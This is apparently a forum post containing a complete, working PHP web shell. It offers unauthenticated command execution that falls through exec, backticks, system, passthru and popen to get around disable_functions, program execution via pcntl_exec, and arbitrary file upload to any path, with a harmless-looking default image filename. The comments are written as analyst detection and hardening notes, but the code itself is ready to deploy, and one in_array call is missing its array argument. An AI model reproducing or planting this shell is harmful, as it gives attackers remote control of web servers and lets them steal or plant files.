
10.05.2010, 21:55
PHP код:
<font face="monospace,terminal" size="-1"><pre>
<?php
// Analyst note: this listing is a PHP web shell (remote command execution plus
// arbitrary file upload). Comments are written for triage and detection.
// Discard the currently active output buffer, then open a new one so that
// everything printed from here on is captured until the final block emits it.
ob_end_clean();
ob_start();
// Default: no functions treated as disabled. Replaced further down with the
// parsed value of the disable_functions ini setting when ini_get() is callable.
$disablefuncs = array();
/**
 * Web-shell helper: runs $cmd as an operating-system command with the
 * privileges of the PHP process and returns what the command printed.
 *
 * The PHP execution primitives are tried in a fixed order and the first usable
 * one wins: exec(), the backtick operator (equivalent to shell_exec()),
 * system(), passthru(), popen().
 *
 * Hardening note: because of this fall-through, a disable_functions policy only
 * stops the helper if it covers every primitive in the chain (and proc_open /
 * pcntl_exec, which other code paths commonly use). Detection note: each branch
 * ends in a child process spawned by the PHP/web-server process, which is the
 * most reliable host-side signal for this class of script.
 *
 * @param string $cmd Command line; in this file it comes straight from $_POST['execl'].
 * @return string Command output, '' for an empty command, or a fixed failure message.
 */
function myshellexec($cmd) {
// Module-level list built from the disable_functions ini value.
global $disablefuncs;
if (empty($cmd)) {
return '';
}
$result = '';
// exec() fills $result with one array element per output line; they are re-joined with "\n".
if (is_callable('exec') and !in_array('exec', $disablefuncs)) {
exec($cmd, $result);
$result = join("\n", $result);
// Backtick operator: the command runs inside the condition itself, so the branch body is empty.
} elseif (($result = `$cmd`) !== FALSE) {
} elseif (is_callable('system') and !in_array('system')) {
// system() prints directly, so a nested output buffer is used to capture the text.
ob_start();
system($cmd);
$result = ob_get_contents();
// ob_clean() empties the nested buffer but leaves it open.
ob_clean();
} elseif (is_callable('passthru') and !in_array('passthru', $disablefuncs)) {
// Same capture technique as the system() branch.
ob_start();
passthru($cmd);
$result = ob_get_contents();
ob_clean();
// Last resort: open a read pipe to the command and drain it in 1024-byte chunks.
} elseif (is_resource($fp = popen($cmd,"r"))) {
while(!feof($fp)) {
$result .= fread($fp, 1024);
}
pclose($fp);
} else {
$result = 'Shit. Can\'t execute command.';
}
return $result;
}
// Reads the server's disable_functions setting so myshellexec() can skip
// primitives the administrator has blocked. The value is a comma-separated
// string: spaces are stripped, then it is split into an array of names.
// An empty or unset value yields an empty array.
if (is_callable('ini_get')) {
$disablefuncs = ini_get("disable_functions");
if (!empty($disablefuncs)) {
$disablefuncs = str_replace(' ', '', $disablefuncs);
$disablefuncs = explode(',', $disablefuncs);
} else {
$disablefuncs = array();
}
}
// Request dispatch. None of the three handlers performs authentication or
// input validation; anyone who can reach the script can use them.
// Request-side indicators visible in this file: POST fields named execl,
// pcntl_exec, pcntl_exec_param and fname, and a multipart file field upfile.

// Handler 1: echoes the submitted command back unescaped (so it is also
// reflected into the HTML response) and prints the output of myshellexec().
if (isset($_POST['execl'])) {
echo $_POST['execl']. '<br>';
echo myshellexec($_POST['execl']);
}
// Handler 2: passes a POST-supplied program path and argument value directly to
// pcntl_exec(), which executes the program in the current process space. This
// path does not go through myshellexec(), so the script's own $disablefuncs
// check is not applied; only the engine's enforcement of disable_functions
// (or the absence of the pcntl extension) blocks it.
if (isset($_POST['pcntl_exec'])) {
pcntl_exec($_POST['pcntl_exec'], $_POST['pcntl_exec_param']);
}
// Handler 3: arbitrary file write. The destination path is taken verbatim from
// POST field fname with no extension, directory or overwrite check, so the file
// lands wherever the PHP process may write. Mitigations: serve upload and other
// writable directories with script execution disabled, and alert on new or
// modified script files created by the web-server account.
if (isset($_FILES['upfile'])) {
if (is_uploaded_file($_FILES['upfile']['tmp_name'])) {
move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST['fname']);
echo '<b>Uploaded!</b>';
}
}
?><br>
</pre>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">
/bin/bash: <input type="text" name="execl" id="bash" style="width:80%"><input type="submit">
</form><br>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>">
pcntl_exec: <input type="text" name="pcntl_exec" style="width:200px"><input type="text" name="pcntl_exec_param" style="width:70%"><input type="submit">
</form>
<form method="POST" action="<?php echo '?'. $_SERVER['QUERY_STRING']; ?>" enctype="multipart/form-data">
upload: <input type="text" name="fname" style="width:200px" value="profilepic605_1.png"><input type="file" name="upfile" style="width:70%"><input type="submit">
</form>
<script>document.getElementById("bash").focus();</script>
</font>
<?php
// Take everything captured since the buffer was opened at the top of the
// script (command output plus the forms), turn each newline into an HTML line
// break so multi-line output stays readable in a browser, then close the
// buffer and send the result.
$text = str_replace("\n", '<br />', ob_get_contents());
ob_end_clean();
echo $text;
?>